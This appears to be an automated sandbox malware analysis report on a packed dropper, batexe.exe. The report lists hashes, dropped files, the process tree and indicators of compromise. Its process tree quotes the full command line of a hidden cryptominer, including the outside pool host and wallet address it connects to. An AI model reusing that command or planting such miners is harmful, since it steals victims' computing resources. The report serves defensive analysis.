73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
296s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
12/02/2024, 01:25

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4448	b2e.exe
3956	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3956	cpuminer-sse2.exe
3956	cpuminer-sse2.exe
3956	cpuminer-sse2.exe
3956	cpuminer-sse2.exe
3956	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4572-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4572 wrote to memory of 4448	4572	batexe.exe	74
PID 4572 wrote to memory of 4448	4572	batexe.exe	74
PID 4572 wrote to memory of 4448	4572	batexe.exe	74
PID 4448 wrote to memory of 3704	4448	b2e.exe	75
PID 4448 wrote to memory of 3704	4448	b2e.exe	75
PID 4448 wrote to memory of 3704	4448	b2e.exe	75
PID 3704 wrote to memory of 3956	3704	cmd.exe	78
PID 3704 wrote to memory of 3956	3704	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4572
- C:\Users\Admin\AppData\Local\Temp\B67F.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\B67F.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\B67F.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4448
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BC2C.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3704
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3956

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\B67F.tmp\b2e.exe

Filesize
768KB

MD5
41acb3c7c35169437c8e50c36e39f5a5

SHA1
6b7a95c8fb404247edb7430b46e931495eeba0d1

SHA256
77003c5f07279f31ace3879feb99ce0568a05bc7bc56ecd5707bc0581cb6016a

SHA512
670b258078f3ccd9e3e710a994d95d406094dab87b4e4e11e3b312a7883631877ea896bc53150cb8b9bb8a0500df129005973212fce0541978df505edbe7d145

Download Submit
C:\Users\Admin\AppData\Local\Temp\B67F.tmp\b2e.exe

Filesize
833KB

MD5
1cfada1929fc2a61a11a57220a460542

SHA1
c2dd85311b35eef950c301978f5416e6170232a7

SHA256
8b61c8a96e476730ac65005c8339c73fa5a64d9680432e7a2531fb377bfd5cb5

SHA512
5196136825a4d3f9135c27d942840cb67e84c0c1d3ea8ba9c93ed3b44d0cdbf9f5b14210ac64eed5f8748145bf04d749ccfdea6dfec72c3cb8d5fcf8cd08aa2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\BC2C.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
816KB

MD5
3cdd8baf3353ddda9f3ef29d7068dcfe

SHA1
1c8fafc59283a1b53fb673bd5f80ca6e96173e66

SHA256
7518edb49f4a71b6f77c8dff692944be807f7ff226be5271a8fa3bbca578d4e2

SHA512
74cf6aa608853bcff8157b559dab7b0e99ed1945412fe9750aeb18c69334b4c823b6c7e8d5e25e8f8d1694a33ad49a049b315fef8fea374411f4af1c01757f3c

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
553KB

MD5
062996671cfb5a450f8312e0f34a72d4

SHA1
c03260125fbbeb91cb4295fd6e435d9853a855ec

SHA256
f895be0105ee95a28a25e6143221929a25754433e847654428dc9ed35291553e

SHA512
3ddfe8ab3f366435822bac941741727a684ae399b7cf0ad8fe8fc7f7fa1da0e9960be62818e692032b774ff1edcce2860cc8566e3d5443c8eea1fb2c66b619f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
405KB

MD5
0143bacbbf71e18c096dedd06f3fe3fd

SHA1
b3e032ed75c92d8c97f5a9684878048ca22a4f03

SHA256
bfdb5a59866b00662cef034724664f08a26ada56a67399ec4e958108e0247748

SHA512
d46a655cbfefecb30b6264a50043cab1bb11fb058423c15491b5557f515eb9e0b5fbd3ce8e690f38f32a3475ea4b006768ba766cafe5e1072762917a9eae55e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
259KB

MD5
1888ae9f38ba1edd4f72bcb2214bb4f8

SHA1
d50e685930fac7dfc1124827bb90e0b665d9f6e2

SHA256
1efa4e0deb76284c5af6688b94726a5fc6f528c9aaa6e1603af89c62eab98705

SHA512
7a4d7f499505ad7e3be792238fd191e013121f4d22e273964937c9e76fedd2c212dc25c27606d1cd95647a58e37c1af8808c26327b08fdaf6dfe3f6fac14316c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
307KB

MD5
45dc415c5bb32c87947e1211143c83a0

SHA1
9fac180ffb22da209c6ad23dd009d85443427e51

SHA256
8130cdc1089244fd3e1c1f8217cd5f0eda1da28b58056b89752d2836d7d08e27

SHA512
0fd9bbeebde4f4441116e223b2d8220d365c3ffee431409c1befb602133a7ef70c7f6784c77d883b97b7d988f20c2f6da9a453edb4c425577ce83ce87d38e155

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
397KB

MD5
09e67bb102cbcda0a67e9af0d5dc80c0

SHA1
5c923c7bd82590b1c512ad76c391fdf3129bbe0b

SHA256
d595a5d0e0593e990c10cfcb7f7eaf7e6ab66ccee5657b6ed3e47420c59c083d

SHA512
63ffc1159f6d72e31cec5c5bd1a3b8e2b3a9c6c6916b0b20da0eca8119a7477afdbc2d583a8faad30ffe40839d8583d1366f8b6f1c119d18c18e5bc4eb8a75d9

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
544KB

MD5
e2dd977f608114af272f67c1f167004a

SHA1
2a5e5b31bffaf85452ba5c1c2956701f01771ce9

SHA256
8e630d1becf467d03be2f11d7ee37c7d4a9fd5c030b4104ac87e331bd41d5d0e

SHA512
b60d5016b0ac57261057c19e48a28dec5b1859cd4d78b1e05ece761e52026f639227934cee43487f4a82c88f7d5127fd10a029a545c160efc0bdc519e4cb5247

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
361KB

MD5
f5c7983ba2cab14899e214545acdfa69

SHA1
bf71c49817799fccc2567a8feca90e8bf1d001a5

SHA256
6aa1ec33eedd1b0288558baf76600821b012d7d8a361b0cac6c17a7aa85063c0

SHA512
698b5ecea25227ff074f1d89fd6861d299fc37d079ea684a8524b6fa51cadc43e6ff3d0ec989a3646df017ec5a50a92b5583bc4385d5d78c7e684288b6f5d137

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
210KB

MD5
9abdeba27b93e580e5669c54eb95756e

SHA1
4b105ed96e32ae158a1f7b14d965a3986b91e92b

SHA256
9abc32ca77910a92e403634af241ce344ff279e12d341c4380927b11b6ee036c

SHA512
e8ca393facce41bd9830bbc017907a3babdaf8c95039ba2c5125a3bd426d02a923c29b464cca24b674f58507a6adb58fd4e45cc22efcec2cdbedbc929e8da420

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
278KB

MD5
ccbe500350f41757a6361fe6cf4807db

SHA1
9c3260fc33917b2809788d20446d81a824c2be59

SHA256
21abe2780a380a3b06e60e40040b82622c5ce6d145e28d3beb8bf20b52d27e84

SHA512
2e4781a5eb733cdb88d20f66414033019e29e93a15c360c92e34f210e7cd3bcc2724108721bec6c4e72b50e1eae1b20151f234709c33cd32f815d13c28abddcf

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
448KB

MD5
9d1a04f05f75671a5a3ffeb995176c52

SHA1
a45018bb6a5dd52b310c1eb77262354365925a76

SHA256
c777e9d786f5d1d13f78a925453804bf53ee430a38f893f115c2d1ac0f2f07ff

SHA512
d19ea63c26c1d41edd5947d0c5ae70e2461c876563c2baeb1fd4a3986254f7919f8d4c32a9d6b9f4c51c4d5a23ffa90a2011d293a106a0a8813295b2bee06e1f

Download Submit
memory/3956-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3956-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3956-43-0x000000005F450000-0x000000005F4E8000-memory.dmp

Filesize
608KB

Download
memory/3956-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-44-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/3956-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4448-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4448-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4572-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download